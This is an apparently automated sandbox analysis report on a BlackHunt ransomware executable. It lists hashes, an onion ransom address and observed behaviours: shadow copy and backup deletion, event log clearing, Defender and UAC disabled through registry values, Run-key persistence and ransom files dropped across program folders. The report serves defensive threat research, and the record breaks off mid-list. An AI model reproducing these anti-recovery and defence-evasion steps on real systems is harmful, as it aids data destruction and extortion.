Analysis
-
max time kernel
136s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:46
Static task
static1
Behavioral task
behavioral1
Sample
738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe
Resource
win10v2004-20231222-en
General
-
Target
738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe
-
Size
707KB
-
MD5
3f421a88039b2465fdabdb30a5a0069c
-
SHA1
8d05d6cb105e94d356af01866faf557e7106191c
-
SHA256
738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e
-
SHA512
648945f16aa11ee3de3567062986d5d6061b8dbdcb1b1a604e3a50c8c7433f190f08aac0cb699aef89dda419730c37d5080a15dc7c1d3a91ccebe62f9cc64d6c
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1C8avnh:6uaTmkZJ+naie5OTamgEoKxLWx0h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6944 fsutil.exe 18060 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 15620 wevtutil.exe 6940 wevtutil.exe 10520 wevtutil.exe 6828 wevtutil.exe 9528 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6700 bcdedit.exe 6456 bcdedit.exe 6724 bcdedit.exe 19852 bcdedit.exe -
Renames multiple (3377) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6488 wbadmin.exe 13620 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\G: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\L: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\X: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\B: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\W: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\P: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\E: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\H: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\N: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\T: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\K: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\Q: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\J: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\M: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\S: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\Z: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\V: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\R: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\I: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\Y: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened (read-only) \??\O: 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ar-ae\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_retina.png 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt-br_get.svg 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle.cur 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-disabled_32.svg 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ar-ae\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\compare_poster.jpg 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#BlackHunt_Private.key 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#BlackHunt_ReadMe.txt 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_ReadMe.hta 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 13656 13500 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6592 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5216 vssadmin.exe 5888 vssadmin.exe 500 vssadmin.exe 9620 vssadmin.exe 8272 vssadmin.exe 5796 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 13348 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5464 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeRestorePrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeBackupPrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeTakeOwnershipPrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeAuditPrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeSecurityPrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeIncBasePriorityPrivilege 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe Token: SeBackupPrivilege 9320 vssvc.exe Token: SeRestorePrivilege 9320 vssvc.exe Token: SeAuditPrivilege 9320 vssvc.exe Token: SeBackupPrivilege 12252 wbengine.exe Token: SeRestorePrivilege 12252 wbengine.exe Token: SeSecurityPrivilege 12252 wbengine.exe Token: SeSecurityPrivilege 9528 wevtutil.exe Token: SeBackupPrivilege 9528 wevtutil.exe Token: SeSecurityPrivilege 6828 wevtutil.exe Token: SeBackupPrivilege 6828 wevtutil.exe Token: SeSecurityPrivilege 15620 wevtutil.exe Token: SeBackupPrivilege 15620 wevtutil.exe Token: SeSecurityPrivilege 6940 wevtutil.exe Token: SeBackupPrivilege 6940 wevtutil.exe Token: SeSecurityPrivilege 10520 wevtutil.exe Token: SeBackupPrivilege 10520 wevtutil.exe Token: SeDebugPrivilege 13348 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4312 wrote to memory of 3164 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 185 PID 4312 wrote to memory of 3164 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 185 PID 4312 wrote to memory of 4576 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 183 PID 4312 wrote to memory of 4576 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 183 PID 4312 wrote to memory of 4628 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 182 PID 4312 wrote to memory of 4628 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 182 PID 4312 wrote to memory of 3852 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 180 PID 4312 wrote to memory of 3852 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 180 PID 4312 wrote to memory of 4672 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 94 PID 4312 wrote to memory of 4672 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 94 PID 4312 wrote to memory of 976 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 179 PID 4312 wrote to memory of 976 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 179 PID 4312 wrote to memory of 1524 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 178 PID 4312 wrote to memory of 1524 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 178 PID 4312 wrote to memory of 5040 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 177 PID 4312 wrote to memory of 5040 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 177 PID 4312 wrote to memory of 388 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 175 PID 4312 wrote to memory of 388 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 175 PID 4312 wrote to memory of 180 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 97 PID 4312 wrote to memory of 180 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 97 PID 4312 wrote to memory of 4888 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 173 PID 4312 wrote to memory of 4888 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 173 PID 4312 wrote to memory of 1112 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 171 PID 4312 wrote to memory of 1112 4312 738ecd4b1dcbcf7f07945fa72eb393945b00167596ec3334312c2070f25f319e.exe 171 PID 4312 